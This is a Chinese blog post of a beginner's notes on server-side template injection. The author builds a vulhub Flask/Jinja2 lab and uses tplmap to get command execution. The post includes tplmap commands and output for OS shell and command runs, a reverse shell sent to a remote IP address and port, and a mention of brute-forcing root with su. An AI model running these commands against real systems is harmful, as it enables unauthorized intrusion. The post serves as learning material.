ssti渗透笔记

chantAria

已于 2023-07-05 20:43:45 修改

阅读量737

点赞数 1

文章标签： linux

于 2021-01-20 00:29:40 首次发布

本文链接：https://blog.csdn.net/qq_31436871/article/details/112855800

版权

搭建靶机环境

这里我用了vulhub集合.

国内一键安装脚本

curl -sSL https://get.daocloud.io/docker | sh

安装完成后用root应该可以直接使用,我将root添加进了docker用户组

启动docker

sudo systemctl start docker

验证是否正确

sudo docker run hello-world

添加进系统启动项

sudo systemctl enable docker

安装docker-compose

pip install docker-compose

下载vulhub

git clone https://github.com/vulhub/vulhub.git

进入flask/ssti中之后docker-compose build & docker-compose up -d 即可启动容器

访问ip的8000端口如出现如下界面则启动成功

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-G0KEaSjZ-1611073745638)(ssti/image-20210116213526726.png)]

SSTI介绍

ssti即server-side-template-injection(大概),具体参考一篇文章带你理解漏洞之SSTI漏洞

渗透尝试

~~ssti需要猜测目标机器接收的参数,因此使用自动化工具来检测是个不错的选择,在这里我使用tplmap~~

后来发现tplmap只能判断参数能否形成注入,不能检测可注入的参数名称

安装tplmap

我使用的是kali虚拟机,git clone https://github.com/epinna/tplmap

期间安装了下pip遇到很多问题.特此提示:自行编译注意版本

要安装pip，请安全下载get-pip.py](https://bootstrap.pypa.io/get-pip.py)

python get-pip.py即可为指定版本安装pip

我先安装python3后生成了pip,pip3,pip3.8

再安装python2后覆盖了pip,实现了共存

tplmap为python2

安装requirements后即可使用

tplmap尝试

┌──(root💀kali)-[~/tplmap]
└─# ./tplmap.py -u  "http://115.154.173.197:57990/?name=aaa"
[+] Tplmap 0.5
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Testing if GET parameter 'name' is injectable
[+] Smarty plugin is testing rendering with tag '*'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
[+] Mako plugin is testing blind injection
[+] Python plugin is testing rendering with tag 'str(*)'
[+] Python plugin is testing blind injection
[+] Tornado plugin is testing rendering with tag '{{*}}'
[+] Tornado plugin is testing blind injection
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:

  GET parameter: name
  Engine: Jinja2
  Injection: {{*}}
  Context: text
  OS: posix-linux
  Technique: render
  Capabilities:

   Shell command execution: ok
   Bind and reverse shell: ok
   File write: ok
   File read: ok
   Code evaluation: ok, python code

[+] Rerun tplmap providing one of the following options:

    --os-shell                          Run shell on the target
    --os-cmd                            Execute shell commands
    --bind-shell PORT                   Connect to a shell bind to a target port
    --reverse-shell HOST PORT   Send a shell back to the attacker's port
    --upload LOCAL REMOTE       Upload files to the server
    --download REMOTE LOCAL     Download remote files

┌──(root💀kali)-[~/tplmap]
└─# ./tplmap.py -u "http://115.154.173.197:57990/?name=aaa" --os-shell
[+] Tplmap 0.5
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Testing if GET parameter 'name' is injectable
[+] Smarty plugin is testing rendering with tag '*'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
[+] Mako plugin is testing blind injection
[+] Python plugin is testing rendering with tag 'str(*)'
[+] Python plugin is testing blind injection
[+] Tornado plugin is testing rendering with tag '{{*}}'
[+] Tornado plugin is testing blind injection
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:

  GET parameter: name
  Engine: Jinja2
  Injection: {{*}}
  Context: text
  OS: posix-linux
  Technique: render
  Capabilities:

   Shell command execution: ok
   Bind and reverse shell: ok
   File write: ok
   File read: ok
   Code evaluation: ok, python code

[+] Run commands on the operating system.
posix-linux $ ls
app.py

可见此时已经可以在终端执行命令

或者也可以直接执行命令:

./tplmap.py -u "http://115.154.173.197:57990/?name=aaa" --os-cmd "ls /"

手动尝试

上述操作并没有产生什么有用的效果,我们手动尝试学习一下原理

没看懂(摔)

大概看懂了怎么个注入方法,python的话就是随便找一个类然后找到基类然后找到可以import os的类然后利用os执行系统操作,但比较麻烦.我们还是回来继续研究tplmap

tplmap再体验

刚刚我们尝试了–os-shell和–os-cmd执行操作指令,但无法执行的指令是无回显的,就比较难受,接下来我们利用反弹shell来在本地执行指令

首先我在本地开放了一个5656端口,然后

┌──(root💀kali)-[~/tplmap]
└─# ./tplmap.py -u "http://115.154.173.197:57990/?name=aaa" --engine=jinja2 --reverse-shell 115.154.195.137 5656
[+] Tplmap 0.5
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Testing if GET parameter 'name' is injectable
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:

  GET parameter: name
  Engine: Jinja2
  Injection: {{*}}
  Context: text
  OS: posix-linux
  Technique: render
  Capabilities:

   Shell command execution: ok
   Bind and reverse shell: ok
   File write: ok
   File read: ok
   Code evaluation: ok, python code

[+] Incoming connection accepted
/bin/sh: 0: can't access tty; job control turned off
$ ls

app.py
$ whoami

www-data
$ $ mkdir aa

mkdir: cannot create directory ‘aa’: Permission denied

可以看到我们可以直接在本地输入指令

大概原理我猜测是这样的,目标主机建立一个tcp请求,并调用bash,重定向输入输出到tcp请求

通过执行ps aux可以看到确实如此

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3DQGbJnF-1611073745640)(ssti/image-20210117121407894.png)]

这样的一个好处就是权限不允许可以很清楚的看到

接下来我只能想到利用su来暴力破解root账户密码了

除此之外还有--bind-shell PORT ,--upload LOCAL REMOTE ,--download REMOTE LOCAL 三种操作,不过尝试失败了哈哈哈哈哈哈

总结

明白了ssti的攻击原理,初步了解了splmap的安装与应用

虽然没有想到接下来还能做什么不过也算是入门的第一步吧

以及

原理是真的难,脚本小子好爽

chantAria

关注

1
点赞
踩
4

收藏

觉得还不错? 一键收藏
1
评论
ssti渗透笔记

博客搬运自我的个人博客 chantAria的博客精力有限,新博客我会同步到CSDN,但博客内容的更新只会出现在个人博客欢迎大家来玩耍哦!搭建靶机环境这里我用了vulhub集合.国内一键安装脚本curl -sSL https://get.daocloud.io/docker | sh安装完成后用root应该可以直接使用,我将root添加进了docker用户组启动dockersudo systemctl start docker验证是否正确sudo docker run hello-wor
复制链接

扫一扫